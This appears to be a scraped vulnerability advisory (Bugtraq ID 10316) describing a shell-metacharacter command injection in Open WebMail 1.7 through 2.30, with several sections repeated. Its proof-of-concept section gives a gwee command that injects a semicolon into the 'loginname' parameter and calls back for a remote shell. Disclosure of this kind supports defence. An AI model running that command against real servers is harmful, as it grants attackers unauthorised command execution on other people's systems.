Open WebMail Remote Command Execution Variant Vulnerability
BID:10316
Info
Open WebMail Remote Command Execution Variant Vulnerability
| Bugtraq ID: | 10316 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 10 2004 12:00AM |
| Updated: | May 10 2004 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to Nullbyte and Syscalls. |
| Vulnerable: |
Open Webmail Open Webmail 2.30 Open Webmail Open Webmail 2.21 Open Webmail Open Webmail 2.20 Open Webmail Open Webmail 1.90 Open Webmail Open Webmail 1.81 Open Webmail Open Webmail 1.71 Open Webmail Open Webmail 1.8 Open Webmail Open Webmail 1.7 Open Webmail Open Webmail -current |
| Not Vulnerable: | |
Discussion
Open WebMail Remote Command Execution Variant Vulnerability
A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
Exploit / POC
Open WebMail Remote Command Execution Variant Vulnerability
There is no exploit required. However it is reported that several exploits are in public circulation, additionally it has been demonstrated that 'gwee' (http://cycom.se/dl/gwee), can be used as follows to exploit the issue:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl
There is no exploit required. However it is reported that several exploits are in public circulation, additionally it has been demonstrated that 'gwee' (http://cycom.se/dl/gwee), can be used as follows to exploit the issue:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl
Solution / Fix
Open WebMail Remote Command Execution Variant Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Open WebMail Remote Command Execution Variant Vulnerability
References:
References:
- Open Webmail Homepage (Open Webmail)